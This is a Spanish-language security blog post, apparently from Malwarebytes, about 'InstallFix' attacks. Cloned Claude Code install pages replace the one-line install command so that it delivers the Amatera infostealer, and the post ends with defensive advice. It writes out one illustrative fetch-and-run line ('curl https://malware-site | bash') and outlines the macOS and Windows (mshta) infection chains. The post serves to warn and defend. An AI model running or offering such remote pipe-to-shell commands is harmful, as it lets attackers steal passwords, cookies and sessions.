Los atacantes están clonando las páginas de instalación de herramientas populares como Claude Code y sustituyendo los comandos de instalación de una sola línea por malware , principalmente para robar contraseñas, cookies, sesiones y acceso a entornos de desarrollo.
Las guías de instalación modernas a menudo te dicen que copies un solo comando como curl https://malware-site | bash Entra en tu terminal y pulsa Enter. Ese hábito convierte el sitio web en un control remoto: cualquier script que se encuentre en esa URL se ejecuta con tus permisos, a menudo los de un administrador.
Los investigadores descubrieron que los atacantes abusan de este flujo de trabajo manteniendo todo idéntico y cambiando únicamente el punto de conexión de esa única línea de código. Para muchos usuarios no especializados que acaban de empezar a usar herramientas de IA y desarrollo, este método resulta normal, por lo que bajan la guardia.
Pero esto se reduce básicamente a "Confío en este dominio", y eso no es una buena idea a menos que sepas con certeza que es fiable.
Normalmente sucede así: alguien busca "Instalar Claude Code" o "Claude Code CLI", ve un resultado patrocinado en la parte superior con una URL plausible y hace clic sin pensarlo demasiado.
Pero ese anuncio lleva a una página de documentación o descarga clonada: el mismo logotipo, la misma barra lateral, el mismo texto y un botón familiar de "copiar" junto al comando de instalación. En muchos casos, cualquier otro enlace en el que hagas clic en esa página falsa te redirige discretamente al sitio web del proveedor real, por lo que nada más resulta sospechoso.
Similar a los ataques ClickFix , este método se llama InstallFix . El usuario ejecuta el código que infecta su propia máquina, bajo falsas pretensiones, y la carga útil suele ser un programa de robo de información .
El principal objetivo de estos casos de InstallFix relacionados con Claude Code es un programa de robo de información llamado Amatera. Este programa se centra en datos del navegador, como contraseñas guardadas, cookies, tokens de sesión, datos de autocompletado e información general del sistema que permite a los atacantes perfilar el dispositivo. De esta forma, pueden secuestrar sesiones web e iniciar sesión en paneles de control en la nube y paneles de administración internos sin necesidad de la contraseña real del usuario. Algunos informes también mencionan un interés en monederos de criptomonedas y otras cuentas de alto valor.
Windows y Mac
La campaña basada en el Código Claude que encontraron los investigadores estaba equipada para dirigirse a ambos Windows y Mac usuarios.
En macOS, el script malicioso de una sola línea suele extraer un script de segunda etapa de un dominio controlado por el atacante, a menudo ofuscado con base64 para que parezca ruidoso pero inofensivo a primera vista. Ese script descarga y ejecuta un binario de otro dominio, eliminando sus atributos y haciéndolo ejecutable antes de iniciarlo.
En Windows Se ha observado que el comando genera cmd.exe, que luego llama mshta.exe con una URL remota. Esto permite que la lógica del malware se ejecute como un binario de Microsoft de confianza en lugar de un ejecutable aleatorio obvio. En ambos casos, no aparece nada espectacular en pantalla: uno piensa que acaba de instalar una herramienta, mientras que la carga útil real comienza a funcionar silenciosamente en segundo plano.
Cómo mantenerse a salvo
Con ClickFix e InstallFix campando a sus anchas —y no parece que vayan a desaparecer pronto— es importante estar informado, ser precavido y protegerse.
- Tómate tu tiempo. No te apresures a seguir las instrucciones de una página web o un mensaje, especialmente si te pide que ejecutes comandos en tu dispositivo o que copies y pegues código. Analiza qué hará el comando antes de ejecutarlo.
- Evite ejecutar comandos o scripts de fuentes no confiables. Nunca ejecute código o comandos copiados de sitios web, correos electrónicos o mensajes a menos que confíe en la fuente y comprenda el propósito de la acción. Verifique las instrucciones de forma independiente. Si un sitio web le indica que ejecute un comando o realice una acción técnica, consulte la documentación oficial o póngase en contacto con el soporte técnico antes de continuar.
- Limite el uso de copiar y pegar para los comandos. Escribir los comandos manualmente en lugar de copiarlos y pegarlos puede reducir el riesgo de ejecutar involuntariamente programas maliciosos ocultos en el texto copiado.
- Proteja sus dispositivos. Utilice una solución antimalware actualizada y en tiempo real con un componente de protección web.
- Infórmese sobre las técnicas de ataque en constante evolución. Comprender que los ataques pueden provenir de vectores inesperados y evolucionar ayuda a mantener la vigilancia. ¡Siga leyendo nuestro blog!
Consejo práctico: ¿Sabías que la extensión gratuita Malwarebytes Browser Guard te avisa cuando un sitio web intenta copiar algo al portapapeles?
Desde denunciar las amenazas hasta eliminarlas.
Los riesgos de ciberseguridad nunca deberían trascender un simple titular. Mantén tus dispositivos protegidos contra amenazas descargando Malwarebytes hoy mismo .




